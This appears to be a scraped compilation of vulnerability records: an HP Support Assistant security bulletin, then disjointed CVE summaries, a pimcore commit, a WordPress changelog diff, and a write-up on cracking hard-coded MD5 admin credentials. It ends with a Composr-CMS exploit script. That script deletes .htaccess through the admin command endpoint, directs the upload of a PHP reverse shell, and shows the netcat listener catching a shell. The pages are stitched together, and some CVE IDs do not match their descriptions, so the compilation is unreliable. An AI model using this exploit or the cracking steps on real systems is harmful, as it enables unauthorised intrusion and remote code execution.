Potential security vulnerabilities including compromise of integrity, and allowed communication with untrusted clients has been identified in HP Support Assistant software.

**hp-concentra-wrapper-portlet**

 Actions

Potential security vulnerabilities have been identified in HP Support Assistant. These vulnerabilities include privilege escalation, compromise of integrity, allowed communication with untrusted clients, and unauthorized modification of files.

Severity

High

HP Reference

HPSBGN03762 Rev. 2

Release date

January 21, 2022

Last updated

January 25, 2022

Category

HP Support Assistant

Potential Security Impact

Privilege Escalation, Compromise of Integrity, Allowed Communication with Untrusted Clients, Unauthorized Modification of Files

**Relevant Common Vulnerabilities and Exposures (CVE) List**

PSR-2021-0077, CVE-2022-23453 (Ammarit Thongthua and Sitthinut Haruanpuach (Secure D Research team)), PSR-2021-0090, CVE-2022-23454 (Ammarit Thongthua and Chayanin Khawsanit (Secure D Research team)), PSR-2021-0091, CVE-2022-23455 (Ammarit Thongthua and Chayanin Khawsanit (Secure D Research team)), PSR-2021-0103, CVE-2022-23456 (Ammarit Thongthua, Chayanin Khawsanit, and Krischat Thataristorai (Secure D Research team)), PSR-2020-0083, CVE-2020-6917 (Jake Valletta and Rod Deichler, FireEye/Mandiant), CVE-2020-6918 (Jake Valletta and Rod Deichler, FireEye/Mandiant), CVE-2020-6919 (Jake Valletta and Rod Deichler, FireEye/Mandiant), CVE-2020-6920 (Jake Valletta and Rod Deichler, FireEye/Mandiant), CVE-2020-6921 (Jake Valletta and Rod Deichler, FireEye/Mandiant), CVE-2020-6922 (Jake Valletta and Rod Deichler, FireEye/Mandiant)

List of CVE IDs    

CVE ID

CVS 3.0

Severity

Vector

CVE-2022-23453

7.8

High

CVSS:3.1/ AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-23454

7.8

High

CVSS:3.1/ AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-23455

7.8

High

CVSS:3.1/ AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-23456

7.8

High

CVSS:3.1/ AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2020-6917

7.2

High

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N

CVE-2020-6918

6.9

Medium

CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N

CVE-2020-6919

6.9

Medium

CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N

CVE-2020-6920

5.0

Medium

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

CVE-2020-6921

6.9

Medium

CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N

CVE-2020-6922

6.9

Medium

CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N

Learn more about CVSS 3.0 base metrics, which range from 0 to 10.

PSR-2021-0077, PSR-2021-0090, PSR-2021-0091, PSR-2021-0103, PSR-2020-0083

**Resolution**

HP strives to address all security issues with HP Support Assistant at best possible speed and makes the latest version available with the fixes. HP recommends customers to update to latest version of HP Support Assistant that includes fixes to above listed issues by turning on automatic updates within HP Support Assistant settings. If the system has HP Support Assistant 8x version, HP advises customers to upgrade to HP Support Assistant 9 version by going to **About** section and checking for updates. If the system has HP Support Assistant version 9, HP recommends keeping MS store updates turned on so that the application is always kept up to date.

Alternately customers can also get latest version at https://www.hp.com/go/hpsupportassistant.

HP recommends keeping your system up to date with the latest firmware and software.

Note:

This bulletin might be updated when new information and/or SoftPaqs are available. Sign up for HP Subscriptions to be notified and receive:

*   Product support eAlerts
    
*   Driver updates
    
*   Security Bulletin updates
    

**Supported software versions**

Versions earlier than 9.11 of HP Support Assistant.

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

2

Relevant Common Vulnerabilities and Exposures (CVE) List text added.

January 25, 2022

1

Initial Release

January 22, 2022

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2022 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

CVE-2020-6922: Multiple vulnerabilities in HP Support Assistant

Hospital Management System v4.0 was discovered to contain a blind SQL injection vulnerability via the register function in func2.php.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2022-24226: CVE/CVE-2022-24226/CVE-2022-24226.pdf at main · Nguyen-Trung-Kien/CVE

Flatpress v1.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability in the Upload SVG File function.

CVE-2021-46253 XSS v.0.12.7 store in archor cms 5.4 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46253 https://nvd.nist.gov/vuln/detail/CVE-2021-46253 CVE-2021-46458 Victor CMS v1.0 was discovered to contain a SQL injection vulnerability in the component admin/posts.php?source=add\_post. This vulnerability can be exploited through a crafted POST request via the post\_title parameter. 7.5 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46458 https://nvd.nist.gov/vuln/detail/CVE-2021-46458 CVE-2021-46459 Victor CMS v1.0 was discovered to contain multiple SQL injection vulnerabilities in the component admin/users.php?source=add\_user. These vulnerabilities can be exploited through a crafted POST request via the user\_name, user\_firstname,user\_lastname, or user\_email parameters. 7.5 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46459 https://nvd.nist.gov/vuln/detail/CVE-2021-46459 CVE-2021-46253 Hospital Management System v4.0 was discovered to contain a blind SQL injection vulnerability via the register function in func2.php. 7.5 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24226 https://nvd.nist.gov/vuln/detail/CVE-2022-24226 CVE-2022-24227 A cross-site scripting (XSS) vulnerability in BoltWire v7.10 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the name and lastname parameters. 6.1 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24227 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24227 CVE-2022-24585 A stored cross-site scripting (XSS) vulnerability in the component /core/admin/comment.php of PluXml v5.8.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the author parameter. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-24585 https://nvd.nist.gov/vuln/detail/CVE-2022-24585 CVE-2022-24586 A stored cross-site scripting (XSS) vulnerability in the component /core/admin/categories.php of PluXml v5.8.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the content and thumbnail parameters. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-24586 https://nvd.nist.gov/vuln/detail/CVE-2022-24586 CVE-2022-24587 A stored cross-site scripting (XSS) vulnerability in the component core/admin/medias.php of PluXml v5.8.7 allows attackers to execute arbitrary web scripts or HTML. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-24587 https://nvd.nist.gov/vuln/detail/CVE-2022-24587 CVE-2022-24588 Flatpress v1.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability in the Upload SVG File function. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-24588 https://nvd.nist.gov/vuln/detail/CVE-2022-24588 CVE-2022-24589 Burden v3.0 was discovered to contain a stored cross-site scripting (XSS) in the Add Category function. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the task parameter. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-24589 https://nvd.nist.gov/vuln/detail/CVE-2022-24589 CVE-2022-24590 A stored cross-site scripting (XSS) vulnerability in the Add Link function of BackdropCMS v1.21.1 allows attackers to execute arbitrary web scripts or HTML. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-24590 https://nvd.nist.gov/vuln/detail/CVE-2022-24590

CVE-2022-24588: GitHub - Nguyen-Trung-Kien/CVE: CVE Update

Tongda2000 v11.10 was discovered to contain a SQL injection vulnerability in /mobile_seal/get_seal.php via the DEVICE_LIST parameter.

CVE-2022-24206

Tongda2000 v11.10 was discovered to contain a SQL injection vulnerability in export_data.php via the d_name parameter.

CVE-2022-23902

Exposure of Sensitive Information to an Unauthorized Actor in Packagist pimcore/pimcore prior to 10.3.1.

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

Svg sanitization (#11386)

\* setting up the svg saniziter on logo and assets upload

\* more detailed exception message

\* changed to mime type check instead of file extension

\* adding the sanitization to "Upload new version"

\* refactor to sanitize on preAdd/preUpdate, rollback AssetController.php

\* fix resource|string, null given on mime\_content\_type

\* using symfony mime component + small tweaks

\* avoiding save without changes case

\* tweak when checking if is image type

*   Loading branch information

CVE-2022-0565: Svg sanitization (#11386) · pimcore/pimcore@7697f70

The CMP WordPress plugin before 4.0.19 allows any user, even not logged in, to arbitrarily change the coming soon page layout.

*   **cmp-coming-soon-maintenance/trunk/readme.txt**
    
    r2633406
    
    r2657597
    
     
    
    6
    
    6
    
    Requires PHP: 5.6
    
    7
    
    7
    
    Tested up to: 5.8
    
    8
    
     
    
    Stable tag: 4.0.18
    
     
    
    8
    
    Stable tag: 4.0.19
    
    9
    
    9
    
    License: GPLv2 or later
    
    10
    
    10
    
    License URI: https://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    161
    
    161
    
    162
    
    162
    
    \== Changelog ==
    
     
    
    163
    
    <h4>CMP 4.0.19 - 14-Jan-22</h4>
    
     
    
    164
    
    <ul>
    
     
    
    165
    
        <li>Fixed security issue, when unauthenticated user could update the CSS styles for CMP themes.</li>
    
     
    
    166
    
        <li>Updated purge caching function</li>
    
     
    
    167
    
    </ul>
    
    163
    
    168
    
    <h4>CMP 4.0.18 - 22-Nov-21</h4>
    
    164
    
    169
    
    <ul>

CVE-2022-0188: Changeset 2657597 for cmp-coming-soon-maintenance – WordPress Plugin Repository

Dairy Farm Shop Management System v1.0 was discovered to contain hardcoded credentials in the source code which allows attackers access to the control panel if compromised.

Exploit Title: Dairy Farm Shop Management System  — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access

**Date: 2020–12-25****Exploit Author: VIVEK PANDAY    ****Vendor Homepage: https://phpgurukul.com/****Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/****Version: 1.0****Tested on: Windows 10****Linkedln Contact: https://www.linkedin.com/in/vivek-panday-796768149/****CVE:2020-36062**

**\[ Hardcoded Credentials:\]**

Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non-encrypted) passwords and other secrets (SSH Keys, DevOps secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk.

**\[Attack Vectors\]**

An attacker can gain admin panel access using default credentials and do malicious activities

**Proof Of Concept**

1 Download source code from https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/

2 Now unzip it and go to the Database folder here we can see one SQL file.

3 Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.  
Mitigation:Always use a strong encryption algorithm like SHA-256 with SALT.Never use default credentials always change during installation time

CVE-2020-36062: CVE:2020-36062 Dairy Farm Shop Management System — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access · Issue #3 · VivekPanday12/CVE-

Hospital Management System v4.0 was discovered to contain a SQL injection vulnerability in /Hospital-Management-System-master/contact.php via the txtMsg parameters.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-24646: VULNERABLE: SQL Injection  exists in Hospital-Management-System. An attacker can inject query in “/Hospital-Management-System-master/contact.php" via the ‘txtMsg’ parameters. · Issue #18 · kishan0725/

Authenticated remote code execution (RCE) in Composr-CMS 10.0.39 and earlier allows remote attackers to execute arbitrary code via uploading a PHP shell through /adminzone/index.php?page=admin-commandr.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Authenticated Remote Code Execution in Composr-CMS Version <=10.0.39

\# Remote Code Execution in Composr-CMS 10.0.39 and earlier allows remote attackers to execute arbitrary code via uploading a php shell.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 12th January,2022

\# CVE ID: CVE-2021-46360

\# Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS

\# Vendor: https://compo.sr/download.htm

###############################################

#Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr

#!/usr/bin/python3

import requests

from bs4 import BeautifulSoup

import time

cookies \= {

'has\_cookies': '1',

'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic

'commandr\_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D',

'last\_visit': '1641783779',

'cms\_session\_\_b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a', #You need to change this as it is dynamic

}

headers \= {

'Connection': 'keep-alive',

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',

'Content-Type': 'application/x-www-form-urlencoded',

'Accept': '\*/\*',

'Origin': 'http://192.168.56.116',

'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr',

'Accept-Language': 'en-US,en;q=0.9',

}

params \= (

('keep\_session', 'ef14cc258d93a'), #You need to change this as it is dynamic

)

data \= {

'\_data': 'command=rm .htaccess', \# This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell)

'csrf\_token': 'ef14cc258d93a' #You need to change this as it is dynamic

}

r \= requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep\_session=ef14cc258d93a', headers\=headers, params\=params, cookies\=cookies, data\=data, verify\=False)

soup \= BeautifulSoup(r.text, 'html.parser')

#datap=response.read()

print (soup)

#Step2- Now visit the Content=>File/Media Library and then upload any .php web shell (

#Step 3 Now visit http://IP\_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell:

┌─\[ci@parrot\]─\[~\]

└──╼ $nc \-lvvnp 4444

listening on \[any\] 4444 ...

connect to \[192.168.56.103\] from (UNKNOWN) \[192.168.56.116\] 58984

Linux CVE\-Hunting\-Linux 5.11.0\-44\-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86\_64 x86\_64 x86\_64 GNU/Linux

13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

user :0 :0 Thu17 ?xdm? 46:51 0.04s /usr/lib/gdm3/gdm\-x\-session \-\-run\-script env GNOME\_SHELL\_SESSION\_MODE\=ubuntu /usr/bin/gnome\-session \-\-systemd \-\-session\=ubuntu

uid\=1(daemon) gid\=1(daemon) groups\=1(daemon)

/bin/sh: 0: can't access tty; job control turned off

$ whoami

daemon

$ id

uid\=1(daemon) gid\=1(daemon) groups\=1(daemon)

$ pwd

/

$

Tag

#php